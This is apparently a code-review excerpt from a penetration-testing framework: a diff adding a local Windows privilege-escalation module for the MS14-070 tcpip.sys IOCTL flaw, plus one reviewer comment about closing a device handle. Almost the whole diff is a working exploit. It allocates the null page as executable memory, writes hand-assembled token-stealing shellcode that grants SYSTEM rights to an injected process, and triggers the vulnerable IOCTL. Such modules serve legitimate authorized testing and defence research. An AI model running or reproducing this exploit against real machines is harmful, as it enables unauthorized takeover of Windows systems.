modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

```diff
@@ -0,0 +1,182 @@
+    end
+
+    p = payload.encoded
+    new_pid = create_proc
+
+    unless new_pid
+      fail_with(Failure::Unknown, 'Unable to create a new process.')
+    end
+
+    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
+    unless execute_shellcode(p, nil, new_pid)
+      fail_with(Failure::Unknown, 'Error while executing the payload')
+    end
+
+    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    if handle.nil?
+      fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
+    end
+
+    print_status("Storing the shellcode in memory...")
+    this_proc = session.sys.process.open
+
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
+
+    unless this_proc.memory.writable?(0x1000)
+      fail_with(Failure::Unknown, 'Failed to allocate memory')
+    end
+
+    buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
+
+    sc = "\x60"                       # save registers
+    sc << "\x64\xA1\x24\x01\x00\x00"  # mov eax, [fs:0x124]
+    sc << "\x8B\x40\x38"              # mov eax, [eax+0x38]
+    sc << "\x50"                      # push eax
+    sc << "\xBB\x04\x00\x00\x00"      # mov ebx, 0x4
+    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
+    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
+    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
+    sc << "\x75\xED"                  # jne 0x10
+    sc << "\x8B\xB8\xD8\x00\x00\x00"  # mov edi, [eax+0xd8]
+    sc << "\x83\xE7\xF8"              # and edi, 0xfffffff8
+    sc << "\x58"                      # pop eax
+    sc << "\xBB"                      # mov ebx, new_pid
+    sc << [new_pid].pack('V')
+    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
+    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
+    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
+    sc << "\x75\xED"                  # jne 0x32
+    sc << "\x89\xB8\xD8\x00\x00\x00"  # mov [eax+0xd8], edi
+    sc << "\x61"                      # restore registers
+    sc << "\xBA\x39\xFF\xA2\xBA"      # mov edx, 0xbaa2ff39
+    sc << "\xB9\x00\x00\x00\x00"      # mov ecx, 0x0
+    sc << "\xB8\x3B\x00\x00\x00"      # mov eax, 0x3b
+    sc << "\x8E\xE0"                  # mov fs, eax
+    sc << "\x0F\x35\x00"              # sysexit
+
+    this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
+    this_proc.memory.write(0x38, "\x00\x00")
+    this_proc.memory.write(0x1100, buf)
+    this_proc.memory.write(0x2b, "\x00\x00")
+    this_proc.memory.write(0x2000, sc)
+
+    print_status("Triggering the vulnerability...")
+    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
+    session.railgun.kernel32.CloseHandle(handle)
```

Comment:
Should wrap Lines 120 to 169 in a `begin...ensure` block so that the handle is closed if an exception is raised or we return early...